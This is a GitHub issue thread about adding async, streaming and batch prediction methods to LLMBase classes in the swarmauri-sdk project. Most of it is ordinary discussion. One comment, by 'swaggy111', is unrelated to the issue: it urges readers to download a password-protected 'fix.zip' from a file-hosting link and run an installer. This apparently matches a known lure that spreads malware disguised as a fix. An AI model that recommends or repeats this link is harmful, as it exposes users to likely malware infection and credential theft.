### ISSUE TITLE
Add async, stream, batch, and abatch to LLMs

### ISSUE THREAD

**Issue by cobycloud** [swarmauri/swarmauri-sdk#183]
### Description

Add async, stream, batch, and abatch to LLMs or Agents or Both?

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cobycloud** [comment]
for LLMBase and subclasses:

1. `predict()`
2. `apredict()`
3. `stream()`
4. `astream()`
5. `batch()`
6. `abatch()`

**Comment by MichaelDecent** [comment]
[](https://github.com/swarmauri/swarmauri-sdk/pull/616)
